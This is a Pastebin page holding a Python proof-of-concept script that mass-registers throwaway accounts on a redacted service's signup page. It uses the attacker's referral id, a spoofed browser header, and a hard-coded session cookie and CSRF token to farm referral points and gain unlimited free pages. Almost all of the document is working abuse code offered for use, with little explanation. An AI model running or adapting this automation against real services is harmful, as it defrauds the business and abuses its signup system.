Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! bin/python
- #
- #Desc
- #
- #When u register at __Redacted___.com or __Redacted___.com , you gain 10 ponts , if you invited your friend , you gain additional five points , registeration page was vulnerable to automation , so when you launch burp intruder and register random accounts , you get unlimited points , this is the poc
- import requests,random,string,os,sys
- requests.packages.urllib3.disable_warnings()
- os.system('clear')
- print """\033[93m
- ---------------------------------------------------------------------\033[0;34m
- =============
- ==========================
- ======================================
- ====--------------------------------------=====
- \033[1;31m __Redacted___unlimitted Free Pages
- \033[1;32m@YasserGersy \033[0;34m
- ====--------------------------------------=====
- ======================================
- ===========================
- ============
- ----\033[93m
- ---------------------------------------------------------------------
- """
- proxyDict = { "http" : "http://127.0.0.1:8080", "https" : "https://127.0.0.1:8080", "ftp" : "ftp://127.0.0.1:8080"}
- print '\033[93m'
- ref='4694232c'
- if len(sys.argv) < 2:
- ref=raw_input(' Your refernece id : ')
- else:
- ref=sys.argv[1]
- detected=False
- if len(sys.argv) > 2:
- h=sys.argv[2]
- detected=True
- if detected is False:
- h=raw_input('__Redacted___or __Redacted___(__Redacted___1/__Redacted___2) ?')
- h=h.lower()
- target='__Redacted___'
- if h=='__Redacted___0' or h=='__Redacted___1' or h=='f' or h=='fa' or h=='-__Redacted___2' or h=='-__Redacted___3':
- target='__Redacted___'
- sent=0
- for count in range(1,1000):
- suc=False
- while suc==False:
- try:
- xc=''.join(random.choice(string.lowercase) for i in range(5))
- id=xc+str(count+1)+'%40yaso.com'.replace('%40','@')
- print ('\033[0;33m'+'\n['+str(count)+'] Trying with '+id)
- url='https://www.'+target+'.com/account/signUp'
- headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:48.0) Gecko/20100101 Firefox/48.0'
- ,'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
- ,'Accept-Language': 'en-US,en;q=0.5'
- ,'Referer': 'https://www.'+target+'.com/?ref='+ref+'&s='+target[0].upper()
- ,'Cookie': 'hf_user=c2b4114088519744a1a16ea4576fad8d:08f0b2f643b18e04c4b5d1dd74e224924c45582a; hf_ref=KltdKmh0dHBzOi8vd3d3LmhlbGxvZmF4LmNvbS8/cmVmPTQ2OTQyMzJj; hs_puuid=89ee97372d9419a7c9800ce4d48e7cbec9399864; AWSELB=539B8B06C06731D8DA7FC45A56FD7AE3C92BC75F218439A6D2ECB6FBB76FB853B50DAF56905AC0AD0E55449B95EE7EDD183FB9B5D05CC806A1FAAA7D9D6844720489EDA53273B092450C1AB88DC874C1CC13629C; optimizelyEndUserId=oeu1474810509847r0.5900563481574318; optimizelySegments=%7B%22174938970%22%3A%22direct%22%2C%22175040343%22%3A%22ff%22%2C%22175048562%22%3A%22false%22%7D; optimizelyBuckets=%7B%7D; _hp2_ses_props.34263717=%7B%22ts%22%3A1474810512611%2C%22d%22%3A%22www.'+target+'.com%22%2C%22h%22%3A%22%2F%22%7D; _hp2_id.34263717=%7B%22userId%22%3A%224096601826228145%22%2C%22pageviewId%22%3A%223511581446818114%22%2C%22sessionId%22%3A%220199106237751283%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%223.0%22%7D; optimizelyPendingLogEvents=%5B%5D'
- ,'Content-Type': 'application/x-www-form-urlencoded'}
- data='signup%5Bredirect_url%5D=&signup%5Bpending_tsm_group_guid%5D=&signup%5Bcoupon_code%5D=&signup%5Bbilling_plan_quota_short_guid%5D=&signup%5Bbilling_period%5D=&signup%5Bcampaign_code%5D=&signup%5Bfirst_name%5D=&signup%5Blast_name%5D=&signup%5Butm_campaign%5D=&signup%5Butm_medium%5D=&signup%5Butm_source%5D=&signup%5Butm_term%5D=&signup%5Bis_from_external%5D=&signup%5B_csrf_token%5D=32af46f3cd2d2e77e715e8c8b4b504095d9850eef3c22585bb0eac6dc6f1ca35&should_show_password=0&signup%5Bemail_address%5D='+id+'&signup%5Bis_opted_in_marketing_emails%5D=1'
- r =requests.post(url=url,data=data,headers=headers,allow_redirects=False)#,proxies=proxyDict)
- body=r.text
- if '<html><head><meta http-equiv="refresh" content="0;url=/onboarding/start"' in body:
- sent=sent+1
- print '\033[1;32m'+'Success ..... Earned '+str(sent*5)+' pages on __Redacted___'
- elif 'refresh" content="0;url=/info/chooseSignupPlan"/></head><' in body:
- sent=sent+1
- print '\033[1;32m'+'Success ..... Earned '+str(sent*5)+' pages on __Redacted___'
- else:
- print r.status_code
- print body+'\n'
- suc=True
- except Exception :
- print '\033[1;31mErro'
- time.sleep(5)
Add Comment
Please, Sign In to add comment